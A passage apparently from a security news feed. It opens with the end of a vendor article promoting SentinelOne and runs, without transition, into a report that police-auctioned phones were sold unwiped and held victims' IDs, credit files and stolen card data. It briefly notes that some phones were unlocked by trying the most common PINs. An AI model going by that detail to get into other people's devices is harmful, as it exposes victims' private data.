Establishing a well-defined incident response process and investing in monitoring tools, such as Security Information and Event Management (SIEM) systems or Extended Detection and Response (XDR) solutions like SentinelOne Singularity, can help organizations quickly detect, respond to, and contain cyber threats.

Conclusion

Identifying attack vectors and new methods are key to staying steps ahead of cyber attackers. Real-life examples and recent APT campaigns have shown how TTPs analysis enriches security practitioners’ repertoire, allowing them to gain valuable insights into the tactics and techniques they are working against.

Though threat actors will continue to upgrade their methods and innovate their processes, there are many ways enterprises can mitigate risk and harden their defenses. Establishing an effective response strategy and deep, continuous monitoring can help augment a business’ in-house team’s defenses with robust detection and response capabilities.

Enterprises worldwide have turned to SentinelOne’s Singularity™ Platform to proactively resolve modern threats at machine speed. Learn how SentinelOne works to more effectively manage risk across user identities, endpoints, cloud workloads, IoT, and more. Contact us or book a demo today.

Re-Victimization from Police-Auctioned Cell Phones

Countless smartphones seized in arrests and searches by police forces across the United States are being auctioned online without first having the data on them erased, a practice that can lead to crime victims being re-victimized, a new study found. In response, the largest online marketplace for items seized in U.S. law enforcement investigations says it now ensures that all phones sold through its platform will be data-wiped prior to auction.

Researchers at the University of Maryland last year purchased 228 smartphones sold “as-is” from PropertyRoom.com, which bills itself as the largest auction house for police departments in the United States. Of phones they won at auction (at an average of $18 per phone), the researchers found 49 had no PIN or passcode; they were able to guess an additional 11 of the PINs by using the top-40 most popular PIN or swipe patterns.

Phones may end up in police custody for any number of reasons — such as its owner was involved in identity theft — and in these cases the phone itself was used as a tool to commit the crime.

“We initially expected that police would never auction these phones, as they would enable the buyer to recommit the same crimes as the previous owner,” the researchers explained in a paper released this month. “Unfortunately, that expectation has proven false in practice.”

The researchers said while they could have employed more aggressive technological measures to work out more of the PINs for the remaining phones they bought, they concluded based on the sample that a great many of the devices they won at auction had probably not been data-wiped and were protected only by a PIN.

Beyond what you would expect from unwiped second hand phones — every text message, picture, email, browser history, location history, etc. — the 61 phones they were able to access also contained significant amounts of data pertaining to crime — including victims’ data — the researchers found.

Some readers may be wondering at this point, “Why should we care about what happens to a criminal’s phone?” First off, it’s not entirely clear how these phones ended up for sale on PropertyRoom.

“Some folks are like, ‘Yeah, whatever, these are criminal phones,’ but are they?” said Dave Levin, an assistant professor of computer science at University of Maryland.

“We started looking at state laws around what they’re supposed to do with lost or stolen property, and we found that most of it ends up going the same route as civil asset forfeiture,” Levin continued. “Meaning, if they can’t find out who owns something, it eventually becomes the property of the state and gets shipped out to these resellers.”

Also, the researchers found that many of the phones clearly had personal information on them regarding previous or intended targets of crime: A dozen of the phones had photographs of government-issued IDs. Three of those were on phones that apparently belonged to sex workers; their phones contained communications with clients.

An overview of the phone functionality and data accessibility for phones purchased by the researchers.

One phone had full credit files for eight different people on it. On another device they found a screenshot including 11 stolen credit cards that were apparently purchased from an online carding shop. On yet another, the former owner had apparently been active in a Telegram group chat that sold tutorials on how to run identity theft scams.

The most interesting phone from the batches they bought at auction was one with a sticky note attached that included the device’s PIN and the notation “Gry Keyed,” no doubt a reference to the Graykey software that is often used by law enforcement agencies to brute-force a mobile device PIN.

“That one had the PIN on the back,” Levin said. “The message chain on that phone had 24 Experian and TransUnion credit histories”.

The University of Maryland team said they took care in their research not to further the victimization of people whose information was on the devices they purchased from PropertyRoom.com. That involved ensuring that none of the devices could connect to the Internet when powered on, and scanning all images on the devices against known hashes for child sexual abuse material.

It is common to find phones and other electronics for sale on auction platforms like eBay that have not been wiped of sensitive data, but in those cases eBay doesn’t possess the items being sold. In contrast, platforms like PropertyRoom obtain devices and resell them at auction directly.

PropertyRoom did not respond to multiple requests for comment. But the researchers said sometime in the past few months PropertyRoom began posting a notice stating that all mobile devices would be wiped of their data before being sold at auction.

“We informed them of our research in October 2022, and they responded that they would review our findings internally,” Levin said. “They stopped selling them for a while, but then it slowly came back, and then we made sure we won every auction. And all of the ones we got from that were indeed wiped, except there were four devices that had external SD [storage] cards in them that weren’t wiped.”

A copy of the University of Maryland study is here (PDF).